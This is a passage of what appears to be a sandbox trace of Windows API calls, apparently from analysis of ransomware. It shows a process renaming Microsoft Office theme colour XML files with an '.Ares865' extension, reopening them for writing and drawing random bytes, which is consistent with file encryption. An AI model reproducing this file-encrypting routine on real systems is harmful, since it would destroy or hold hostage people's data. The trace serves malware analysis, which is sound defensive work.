phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.852] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.852] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.854] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.855] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.855] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.855] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Clarity.xml" | out: lpString1="Clarity.xml") returned="Clarity.xml" [0073.855] lstrlenW (lpString="Clarity.xml") returned 11 [0073.855] lstrlenW (lpString="Ares865") returned 7 [0073.855] lstrcmpiW (lpString1="ity.xml", lpString2="Ares865") returned 1 [0073.855] lstrlenW (lpString=".dll") returned 4 [0073.855] lstrcmpiW (lpString1="Clarity.xml", lpString2=".dll") returned 1 [0073.856] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Clarity.xml.Ares865") returned 85 [0073.856] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Clarity.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\clarity.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Clarity.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\clarity.xml.ares865"), dwFlags=0x1) returned 1 [0073.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Clarity.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\clarity.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.856] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=926) returned 1 [0073.857] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.857] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.857] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.860] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.861] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.861] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.861] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Composite.xml" | out: lpString1="Composite.xml") returned="Composite.xml" [0073.861] lstrlenW (lpString="Composite.xml") returned 13 [0073.861] lstrlenW (lpString="Ares865") returned 7 [0073.862] lstrcmpiW (lpString1="ite.xml", lpString2="Ares865") returned 1 [0073.862] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Composite.xml.Ares865") returned 87 [0073.862] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Composite.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\composite.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Composite.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\composite.xml.ares865"), dwFlags=0x1) returned 1 [0073.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Composite.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\composite.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.863] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=964) returned 1 [0073.863] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.864] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.864] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.869] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.869] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.869] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.870] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Concourse.xml" | out: lpString1="Concourse.xml") returned="Concourse.xml" [0073.870] lstrlenW (lpString="Concourse.xml") returned 13 [0073.870] lstrlenW (lpString="Ares865") returned 7 [0073.870] lstrcmpiW (lpString1="rse.xml", lpString2="Ares865") returned 1 [0073.870] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Concourse.xml.Ares865") returned 87 [0073.870] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Concourse.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\concourse.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Concourse.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\concourse.xml.ares865"), dwFlags=0x1) returned 1 [0073.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Concourse.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\concourse.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.871] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=964) returned 1 [0073.871] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.872] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.872] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.874] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0073.875] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0073.875] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.876] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Couture.xml" | out: lpString1="Couture.xml") returned="Couture.xml" [0073.876] lstrlenW (lpString="Couture.xml") returned 11 [0073.876] lstrlenW (lpString="Ares865") returned 7 [0073.876] lstrcmpiW (lpString1="ure.xml", lpString2="Ares865") returned 1 [0073.876] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Couture.xml.Ares865") returned 85 [0073.876] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Couture.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\couture.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Couture.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\couture.xml.ares865"), dwFlags=0x1) returned 1 [0073.996] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Couture.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\couture.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0073.996] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=962) returned 1 [0073.996] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0073.997] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0073.997] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0073.999] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.000] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.000] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.001] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Elemental.xml" | out: lpString1="Elemental.xml") returned="Elemental.xml" [0074.001] lstrlenW (lpString="Elemental.xml") returned 13 [0074.001] lstrlenW (lpString="Ares865") returned 7 [0074.001] lstrcmpiW (lpString1="tal.xml", lpString2="Ares865") returned 1 [0074.001] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Elemental.xml.Ares865") returned 87 [0074.001] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Elemental.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\elemental.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Elemental.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\elemental.xml.ares865"), dwFlags=0x1) returned 1 [0074.002] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Elemental.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\elemental.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.003] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=964) returned 1 [0074.003] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.004] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.004] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.006] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.006] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.006] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.007] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Equity.xml" | out: lpString1="Equity.xml") returned="Equity.xml" [0074.007] lstrlenW (lpString="Equity.xml") returned 10 [0074.007] lstrlenW (lpString="Ares865") returned 7 [0074.007] lstrcmpiW (lpString1="ity.xml", lpString2="Ares865") returned 1 [0074.007] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Equity.xml.Ares865") returned 84 [0074.007] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Equity.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\equity.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Equity.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\equity.xml.ares865"), dwFlags=0x1) returned 1 [0074.008] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Equity.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\equity.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.008] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=961) returned 1 [0074.008] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.009] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.009] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.011] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.012] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.012] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.012] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Essential.xml" | out: lpString1="Essential.xml") returned="Essential.xml" [0074.012] lstrlenW (lpString="Essential.xml") returned 13 [0074.012] lstrlenW (lpString="Ares865") returned 7 [0074.012] lstrcmpiW (lpString1="ial.xml", lpString2="Ares865") returned 1 [0074.012] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Essential.xml.Ares865") returned 87 [0074.012] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Essential.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\essential.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Essential.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\essential.xml.ares865"), dwFlags=0x1) returned 1 [0074.013] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Essential.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\essential.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.013] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=928) returned 1 [0074.014] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.014] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.014] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.016] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.017] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.017] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.018] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Executive.xml" | out: lpString1="Executive.xml") returned="Executive.xml" [0074.018] lstrlenW (lpString="Executive.xml") returned 13 [0074.018] lstrlenW (lpString="Ares865") returned 7 [0074.018] lstrcmpiW (lpString1="ive.xml", lpString2="Ares865") returned 1 [0074.018] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Executive.xml.Ares865") returned 87 [0074.018] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Executive.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\executive.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Executive.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\executive.xml.ares865"), dwFlags=0x1) returned 1 [0074.018] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Executive.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\executive.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.019] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=964) returned 1 [0074.019] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.019] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.020] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.022] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.022] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.022] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.023] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Flow.xml" | out: lpString1="Flow.xml") returned="Flow.xml" [0074.023] lstrlenW (lpString="Flow.xml") returned 8 [0074.023] lstrlenW (lpString="Ares865") returned 7 [0074.023] lstrcmpiW (lpString1="low.xml", lpString2="Ares865") returned 1 [0074.023] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Flow.xml.Ares865") returned 82 [0074.023] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Flow.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\flow.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Flow.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\flow.xml.ares865"), dwFlags=0x1) returned 1 [0074.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Flow.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\flow.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.024] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=959) returned 1 [0074.024] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.025] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.025] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.029] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.030] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.030] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.031] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Foundry.xml" | out: lpString1="Foundry.xml") returned="Foundry.xml" [0074.031] lstrlenW (lpString="Foundry.xml") returned 11 [0074.031] lstrlenW (lpString="Ares865") returned 7 [0074.031] lstrcmpiW (lpString1="dry.xml", lpString2="Ares865") returned 1 [0074.031] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Foundry.xml.Ares865") returned 85 [0074.031] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Foundry.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\foundry.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Foundry.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\foundry.xml.ares865"), dwFlags=0x1) returned 1 [0074.032] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Foundry.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\foundry.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.032] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=962) returned 1 [0074.032] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.033] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.033] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.035] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.036] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.036] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.036] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Grayscale.xml" | out: lpString1="Grayscale.xml") returned="Grayscale.xml" [0074.036] lstrlenW (lpString="Grayscale.xml") returned 13 [0074.036] lstrlenW (lpString="Ares865") returned 7 [0074.036] lstrcmpiW (lpString1="ale.xml", lpString2="Ares865") returned -1 [0074.036] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grayscale.xml.Ares865") returned 87 [0074.036] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grayscale.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\grayscale.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grayscale.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\grayscale.xml.ares865"), dwFlags=0x1) returned 1 [0074.039] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grayscale.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\grayscale.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.039] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=928) returned 1 [0074.039] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.040] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.040] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.042] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.043] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.043] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.043] lstrcpyW (in: lpString1=0x2e2e8e4, lpString2="Grid.xml" | out: lpString1="Grid.xml") returned="Grid.xml" [0074.043] lstrlenW (lpString="Grid.xml") returned 8 [0074.043] lstrlenW (lpString="Ares865") returned 7 [0074.043] lstrcmpiW (lpString1="rid.xml", lpString2="Ares865") returned 1 [0074.043] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grid.xml.Ares865") returned 82 [0074.043] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grid.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\grid.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grid.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\grid.xml.ares865"), dwFlags=0x1) returned 1 [0074.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grid.xml.Ares865" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\grid.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.045] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=959) returned 1 [0074.045] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0074.046] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0074.046] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0074.048] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0074.049] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0074.049] CryptReleaseContext (hProv=0x2f0380, 